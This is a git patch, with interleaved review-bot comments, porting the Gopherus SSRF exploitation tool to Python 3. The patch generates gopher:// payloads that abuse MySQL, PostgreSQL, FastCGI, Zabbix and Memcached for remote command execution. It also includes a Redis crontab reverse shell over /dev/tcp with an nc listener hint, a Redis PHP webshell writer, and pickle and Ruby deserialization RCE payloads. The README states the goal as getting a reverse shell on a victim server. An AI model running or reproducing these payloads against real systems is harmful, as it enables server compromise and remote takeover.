From 4546f5f106b1a6ef1d001be8dc3b28e6b82d9a11 Mon Sep 17 00:00:00 2001 From: Antabuse-does-something Date: Sun, 23 Jan 2022 12:11:47 -0500 Subject: [PATCH 1/3] Updated python code --- .gitignore | 1 + README.md | 5 +++ gopherus.py | 63 ----------------------------- gopherus3.py | 68 +++++++++++++++++++++++++++++++ install.sh | 8 ++-- requirements.txt | 2 + scripts/DumpMemcached.py | 12 +++--- scripts/FastCGI.py | 19 ++++----- scripts/MySQL.py | 45 ++++++++++----------- scripts/PHPMemcached.py | 20 ++++----- scripts/PostgreSQL.py | 20 ++++----- scripts/PyMemcached.py | 30 +++++++------- scripts/RbMemcached.py | 29 +++++++------- scripts/Redis.py | 87 ++++++++++++++++++++-------------------- scripts/SMTP.py | 20 ++++----- scripts/Zabbix.py | 14 +++---- scripts/__init__.py | 1 - 17 files changed, 230 insertions(+), 214 deletions(-) delete mode 100755 gopherus.py create mode 100755 gopherus3.py create mode 100644 requirements.txt delete mode 100644 scripts/__init__.py diff --git a/.gitignore b/.gitignore index 0d20b64..feae5c1 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ *.pyc +__pycache__ \ No newline at end of file diff --git a/README.md b/README.md index 7410481..387e860 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,11 @@ # Gopherus If you know a place which is SSRF vulnerable then, this tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server. And for more information you can get a blog on the same [Blog on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/) + +## Note : + +This repo is a fork from the Original Tool but I have updated the code from python2 to python3 and added a new feature to select the port for the reverse shell(Redis). + ## About This tool can generate payload for following: 1. MySQL (Port-3306) 
diff --git a/gopherus.py b/gopherus.py deleted file mode 100755 index e7dd713..0000000 --- a/gopherus.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/python2 -import argparse -import sys -sys.path.insert(0,'./scripts/') -from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix - -parser = argparse.ArgumentParser() -parser.add_argument("--exploit", - help="mysql,\n" - "postgresql,\n" - "fastcgi,\n" - "redis,\n" - "smtp,\n" - "zabbix,\n" - "pymemcache,\n" - "rbmemcache,\n" - "phpmemcache,\n" - "dmpmemcache") -args = parser.parse_args() - -class colors: - reset='\033[0m' - red='\033[31m' - green='\033[32m' - orange='\033[33m' - blue='\033[34m' - -print colors.green + """ - - ________ .__ - / _____/ ____ ______ | |__ ___________ __ __ ______ -/ \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ -\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ - \______ /\____/| __/|___| /\___ >__| |____//____ > - \/ |__| \/ \/ \/ -""" + "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset - -if(not args.exploit): - print parser.print_help() - exit() - -if(args.exploit=="mysql"): - MySQL.MySQL() -elif(args.exploit=="postgresql"): - PostgreSQL.PostgreSQL() -elif(args.exploit=="fastcgi"): - FastCGI.FastCGI() -elif(args.exploit=="redis"): - Redis.Redis() -elif(args.exploit=="smtp"): - SMTP.SMTP() -elif(args.exploit=="zabbix"): - Zabbix.Zabbix() -elif(args.exploit=="dmpmemcache"): - DumpMemcached.DumpMemcached() -elif(args.exploit=="phpmemcache"): - PHPMemcached.PHPMemcached() -elif(args.exploit=="rbmemcache"): - RbMemcached.RbMemcached() -elif(args.exploit=="pymemcache"): - PyMemcached.PyMemcached() -else: - print parser.print_help() diff --git a/gopherus3.py b/gopherus3.py new file mode 100755 index 0000000..68657a2 --- /dev/null +++ b/gopherus3.py 
@@ -0,0 +1,68 @@ +#!/usr/bin/python +import argparse +from ast import match_case +import sys +sys.path.insert(0, './scripts/') +from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix + + +class colors: + reset='\033[0m' + red='\033[31m' + green='\033[32m' + orange='\033[33m' + blue='\033[34m' + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("--exploit", + help="mysql,\n" + "postgresql,\n" + "fastcgi,\n" + "redis,\n" + "smtp,\n" + "zabbix,\n" + "pymemcache,\n" + "rbmemcache,\n" + "phpmemcache,\n" + "dmpmemcache") + args = parser.parse_args() + print(colors.green + """ + ________ .__ ________ + / _____/ ____ ______ | |__ ___________ __ __ ______ \_____ \ + / \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ _(__ < + \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ / \\ + \______ /\____/| __/|___| /\___ >__| |____//____ > /______ / + \/ |__| \/ \/ \/ \/ + """+ "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset) + + if(not args.exploit): + print(parser.print_help()) + sys.exit(1) + + if(args.exploit=="mysql"): + MySQL.MySQL() + elif(args.exploit=="postgresql"): + PostgreSQL.PostgreSQL() + elif(args.exploit=="fastcgi"): + FastCGI.FastCGI() + elif(args.exploit=="redis"): + Redis.Redis() + elif(args.exploit=="smtp"): + SMTP.SMTP() + elif(args.exploit=="zabbix"): + Zabbix.Zabbix() + elif(args.exploit=="dmpmemcache"): + DumpMemcached.DumpMemcached() + elif(args.exploit=="phpmemcache"): + PHPMemcached.PHPMemcached() + elif(args.exploit=="rbmemcache"): + RbMemcached.RbMemcached() + elif(args.exploit=="pymemcache"): + PyMemcached.PyMemcached() + else: + print(parser.print_help()) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/install.sh b/install.sh index b4d9023..151035a 100755 --- a/install.sh +++ b/install.sh 
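Review bot: `sys.path.insert(0, './scripts/')` prepends a path relative to the current working directory rather than to the script, so once `install.sh` symlinks `gopherus3.py` into `/usr/local/bin` the lookup depends on where the user happens to run it, and a stray `scripts/` directory in that cwd would be searched first; as far as I can tell the insert is also redundant, because the file imports `from scripts import ...` and `sys.path[0]` already points at the script's own directory. Either drop the line or anchor it to the file, `sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), 'scripts'))` with `import os`. Both `print(parser.print_help())` calls print the help text and then a stray `None`, since `print_help()` returns nothing; `parser.print_help()` alone is enough. This same patch deletes `scripts/__init__.py`, so the package import now relies on implicit namespace packages (Python 3.3+), which is worth a one-line comment next to the import.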
@@ -1,5 +1,5 @@
 #!/bin/bash
-pip2 install argparse
-pip2 install requests
-chmod +x gopherus.py
-ln -sf $(pwd)/gopherus.py /usr/local/bin/gopherus
+pip3 install -r requirements.txt
+chmod +x gopherus3.py
+sudo ln -sf $(pwd)/gopherus3.py /usr/local/bin/gopherus3
+echo "Gopherus3 installed"
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..05f27b4
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,2 @@
+argparse
+requests
\ No newline at end of file
diff --git a/scripts/DumpMemcached.py b/scripts/DumpMemcached.py
index cd7a24f..6d74416 100644
--- a/scripts/DumpMemcached.py
+++ b/scripts/DumpMemcached.py
@@ -1,12 +1,12 @@
-import urllib
+import urllib.parse
 def DumpMemcached():
- code = raw_input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m")
+ code = input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m")
- payload = urllib.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ payload = urllib.parse.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
 finalpayload = "gopher://127.0.0.1:11211/_%0d%0a" + payload + "%0d%0a"
- print "\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m"
- print finalpayload
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m")
+ print(finalpayload)
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m")
diff --git a/scripts/FastCGI.py b/scripts/FastCGI.py
index edf6b12..5708740 100644
--- a/scripts/FastCGI.py
+++ b/scripts/FastCGI.py
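Review bot: The new `requirements.txt` (same hunk line) lists `argparse`, which has been in the Python 3 standard library since 3.2, so `pip3 install -r requirements.txt` will pull an old third-party backport of that name from PyPI for no benefit — an avoidable supply-chain exposure; drop it. No module in this patch imports `requests` either, so confirm it is still used before keeping it. In `install.sh` the unquoted `$(pwd)` breaks on paths containing spaces; `sudo ln -sf "$(pwd)/gopherus3.py" /usr/local/bin/gopherus3` fixes that, and `set -e` after the shebang would stop the script when `pip3` fails instead of printing `Gopherus3 installed` regardless.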
@@ -1,12 +1,12 @@ -import urllib +import urllib.parse def FastCGI(): - filename = raw_input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m") + filename = input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m") if(not filename): filename="/usr/share/php/PEAR.php" - command=raw_input("\033[96m" +"Terminal command to run: "+ "\033[0m") + command=input("\033[96m" +"Terminal command to run: "+ "\033[0m") length=len(command)+52 char=chr(length) @@ -25,10 +25,11 @@ def FastCGI(): payload = start + data + end - def get_payload(payload): - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/") - return "gopher://127.0.0.1:9000/_" + finalpayload + print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m") + print("\033[04m" + get_payload(payload)+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m" - print "\033[04m" + get_payload(payload)+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + +def get_payload(payload): + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/") + return "gopher://127.0.0.1:9000/_" + finalpayload \ No newline at end of file diff --git a/scripts/MySQL.py b/scripts/MySQL.py index 8353f9b..690c8ff 100644 --- a/scripts/MySQL.py +++ b/scripts/MySQL.py 
@@ -1,7 +1,6 @@ - def MySQL(): - print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m" - user = raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m") + print("\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m") + user = input("\033[96m" +"\nGive MySQL username: " + "\033[0m") encode_user = user.encode("hex") user_length = len(user) temp = user_length - 4 
@@ -13,26 +12,26 @@ def MySQL(): dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d" dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c" - query = raw_input("\033[96m" +"Give query to execute: "+ "\033[0m") + query = input("\033[96m" +"Give query to execute: "+ "\033[0m") auth = dump.replace("\n","") - def encode(s): - a = [s[i:i + 2] for i in range(0, len(s), 2)] - return "gopher://127.0.0.1:3306/_%" + "%".join(a) - - - def get_payload(query): - if(query.strip()!=''): - query = query.encode("hex") - query_length = '{:06x}'.format((int((len(query) / 2) + 1))) - query_length = query_length.decode('hex')[::-1].encode('hex') - pay1 = query_length + "0003" + query - final = encode(auth + pay1 + "0100000001") - return final - else: - return encode(auth) - - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + get_payload(query)+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + get_payload(query,auth)+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") + + +def encode(s): + a = [s[i:i + 2] for i in range(0, len(s), 2)] + return "gopher://127.0.0.1:3306/_%" + "%".join(a) + +def get_payload(query,auth): + if(query.strip()!=''): + query = query.encode("hex") + query_length = '{:06x}'.format((int((len(query) / 2) + 1))) + query_length = query_length.decode('hex')[::-1].encode('hex') + pay1 = query_length + "0003" + query + final = encode(auth + pay1 + "0100000001") + return final + else: + return encode(auth) \ No newline at end of file diff --git a/scripts/PHPMemcached.py b/scripts/PHPMemcached.py index 6de9da9..34ed59c 100644 --- a/scripts/PHPMemcached.py +++ b/scripts/PHPMemcached.py 
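Review bot: The module-level `get_payload` still uses the Python 2 `hex` text codec on `str` — `query.encode("hex")` and `query_length.decode('hex')[::-1].encode('hex')` here, plus the unchanged `user.encode("hex")` in the first hunk — and on Python 3 that raises `LookupError: 'hex' is not a text encoding`, so `MySQL.py` does not actually run after this port. The Python 3 equivalents are `query.encode().hex()`, `bytes.fromhex(query_length)[::-1].hex()` and `user.encode().hex()`. `scripts/PostgreSQL.py` has the same `user.encode("hex")` / `db.encode("hex")` lines in its first hunk. The middle of `MySQL()` between the two hunks is outside the diff.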
@@ -1,20 +1,20 @@
-import urllib
+import urllib.parse
 def PHPMemcached():
- print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m"
+ print("\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m")
- code = raw_input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m")
+ code = input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m")
 if(not code):
- print "\033[93m" + "Plz give payload" + "\033[0m"
+ print("\033[93m" + "Plz give payload" + "\033[0m")
 exit()
 payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m"
- print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m")
+ print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/PostgreSQL.py b/scripts/PostgreSQL.py
index 16b4d68..f50ac22 100644
--- a/scripts/PostgreSQL.py
+++ b/scripts/PostgreSQL.py
@@ -1,7 +1,7 @@ def PostgreSQL(): - user = raw_input("\033[96m" + "PostgreSQL Username: " + "\033[0m") - db = raw_input("\033[96m" + "Database Name: " + "\033[0m") - query = raw_input("\033[96m" + "Query: " + "\033[0m") + user = input("\033[96m" + "PostgreSQL Username: " + "\033[0m") + db = input("\033[96m" + "Database Name: " + "\033[0m") + query = input("\033[96m" + "Query: " + "\033[0m") encode_user = user.encode("hex") encode_db = db.encode("hex") @@ -16,11 +16,13 @@ def PostgreSQL(): packet = start + data + end - def encode(s): - a = [s[i:i + 2] for i in range(0, len(s), 2)] - return "gopher://127.0.0.1:5432/_%" + "%".join(a) - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + encode(packet) + "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + encode(packet) + "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") + +def encode(s): + a = [s[i:i + 2] for i in range(0, len(s), 2)] + return "gopher://127.0.0.1:5432/_%" + "%".join(a) \ No newline at end of file diff --git a/scripts/PyMemcached.py b/scripts/PyMemcached.py index ae8f5b5..353cdb5 100644 --- a/scripts/PyMemcached.py +++ b/scripts/PyMemcached.py @@ -1,10 +1,10 @@ -import cPickle +import pickle import os -import urllib +import urllib.parse def PyMemcached(): - print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m" - server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") + print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m") + server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") if(not server): server = "127.0.0.1" 
@@ -16,18 +16,18 @@ def __reduce__(self): if(cmd): return (os.system,(cmd,)) - command = (cPickle.dumps(PickleRCE())) + command = (pickle.dumps(PickleRCE())) - def get_payload(command): - payload = urllib.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a" - return finalpayload + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m") - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m" + print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m") - print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m" + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" +def get_payload(command): + payload = urllib.parse.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a" + return finalpayload \ No newline at end of file diff --git a/scripts/RbMemcached.py b/scripts/RbMemcached.py index 3c1ffac..104d255 100644 --- a/scripts/RbMemcached.py +++ b/scripts/RbMemcached.py 
@@ -1,8 +1,8 @@ -import urllib +import urllib.parse def RbMemcached(): - print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m" - server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") + print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m") + server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") if(not server): server = "127.0.0.1" 
@@ -13,17 +13,18 @@ def RbMemcached(): payload = """\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0e@instanceo:\x08ERB\x06:\t@srcI\"""" + chr(len(cmd)+10) payload += "%x(" + cmd + """);\x06:\x06ET:\x0c@method:\x0bresult:\t@varI"\x0c@result\x06;\tT:\x10@deprecatoro:\x1fActiveSupport::Deprecation\x06:\x0e@silencedT""" - def get_payload(payload): - payload_len = len(payload) - payload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a" - return finalpayload - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m" - print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m") + print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m") + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + +def get_payload(payload): + payload_len = len(payload) + payload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a" + return 
finalpayload \ No newline at end of file diff --git a/scripts/Redis.py b/scripts/Redis.py index fbea515..67c5518 100644 --- a/scripts/Redis.py +++ b/scripts/Redis.py @@ -1,16 +1,30 @@ -import urllib +import urllib.parse def Redis(): - def get_Redis_ReverseShell(): - server = raw_input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m") - crontab_dir = raw_input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m") - if(not server): - server = "127.0.0.1" - if(not crontab_dir): - crontab_dir = "/var/spool/cron/" - cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/1234 0>&1"' - len_cmd = len(cmd) + 5 - payload = """*1\r + print("\033[01m"+"\nReady To get SHELL\n"+ "\033[0m") + what = input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m") + what = what.lower() + if("rev" in what): + get_Redis_ReverseShell() + elif("php" in what): + get_Redis_PHPShell() + else: + print("\033[93m" +"Plz choose between those two"+ "\033[0m") + exit(1) + +def get_Redis_ReverseShell(): + server = input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m") + port = input("\033[96m" +"\nGive your Port to connect with victim through Revershell (default is 1234): "+ "\033[0m") + crontab_dir = input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m") + if(not server): + server = "127.0.0.1" + if(not crontab_dir): + crontab_dir = "/var/spool/cron/" + if(not port): + port = "1234" + cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/'+port+' 0>&1"' + len_cmd = len(cmd) + 5 + payload = """*1\r $8\r flushall\r *3\r 
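Review bot: `exit(1)` in the new top-level `Redis()` is the `site`-module convenience name, whereas `gopherus3.py` in this same series uses `sys.exit(1)`; use `sys.exit(1)` here as well for consistency, which needs `import sys` beside `import urllib.parse`. The new `port` prompt is only checked for emptiness, so a non-numeric answer is spliced unchanged into the generated text and into the `nc` hint; a guard such as `if not port.isdigit(): sys.exit("port must be numeric")` after the default assignment would catch it early. The body of `get_Redis_ReverseShell` continues past the end of this hunk.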
@@ -48,23 +62,22 @@ def get_Redis_ReverseShell(): save\r """ - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m" - print "\033[01m" +"\nBefore sending request plz do `nc -lvp 1234`"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" - + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + print("\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m") + print("\033[01m" +"\nBefore sending request plz do `nc -lvp "+port+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - def get_Redis_PHPShell(): - web_root_location = raw_input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m") - php_payload = raw_input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m") - default = "" - if(not php_payload): - php_payload = default - if(not web_root_location): - web_root_location = "/var/www/html" - payload = """*1\r +def get_Redis_PHPShell(): + web_root_location = input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m") + php_payload = input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m") + default = "" + if(not php_payload): + php_payload = default + if(not web_root_location): + web_root_location = "/var/www/html" + payload = """*1\r $8\r flushall\r *3\r 
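Review bot: The fourth added line drops the closing backtick that the removed hint had — `"\nBefore sending request plz do `nc -lvp "+port+ "\033[0m"` now ends the quoted command with the colour reset instead of a backtick. `print("\033[01m" +"\nBefore sending request plz do `nc -lvp " + port + "`" + "\033[0m")` restores the original rendering. `get_Redis_ReverseShell` begins before this hunk and `get_Redis_PHPShell` continues past it.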
@@ -101,20 +114,8 @@ def get_Redis_PHPShell(): save\r """ - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m" - print "\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" - - - print "\033[01m"+"\nReady To get SHELL\n"+ "\033[0m" - what = raw_input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m") - what = what.lower() - if("rev" in what): - get_Redis_ReverseShell() - elif("php" in what): - get_Redis_PHPShell() - else: - print "\033[93m" +"Plz choose between those two"+ "\033[0m" - exit() + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + print("\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m") + print("\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/SMTP.py b/scripts/SMTP.py index a005fd0..9324127 100644 --- a/scripts/SMTP.py +++ b/scripts/SMTP.py 
@@ -1,11 +1,11 @@
-import urllib
+import urllib.parse
 def SMTP():
- print "\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m"
- mailfrom = raw_input("\033[96m" +"Mail from : "+ "\033[0m")
- Mailto = raw_input("\033[96m" +"Mail To : "+ "\033[0m")
- subject = raw_input("\033[96m" +"Subject : "+ "\033[0m")
- msg = raw_input("\033[96m" +"Message : "+ "\033[0m")
+ print("\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m")
+ mailfrom = input("\033[96m" +"Mail from : "+ "\033[0m")
+ Mailto = input("\033[96m" +"Mail To : "+ "\033[0m")
+ subject = input("\033[96m" +"Subject : "+ "\033[0m")
+ msg = input("\033[96m" +"Message : "+ "\033[0m")
 commands = [ 'MAIL FROM:' + mailfrom,
@@ -18,8 +18,8 @@ def SMTP():
 ]
 payload = "%0A".join(commands)
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m"
- print "\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/Zabbix.py b/scripts/Zabbix.py
index 216faed..3edf32f 100644
--- a/scripts/Zabbix.py
+++ b/scripts/Zabbix.py
@@ -1,15 +1,15 @@
-import urllib
+import urllib.parse
 def Zabbix():
- print "\033[01m"+"\nExecute SHELL command: \n" + "\033[0m"
- command = raw_input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m")
+ print("\033[01m"+"\nExecute SHELL command: \n" + "\033[0m")
+ command = input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m")
 if(not command): command = "ls"
 payload = "system.run[(" + command + ");sleep 2s]"
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m"
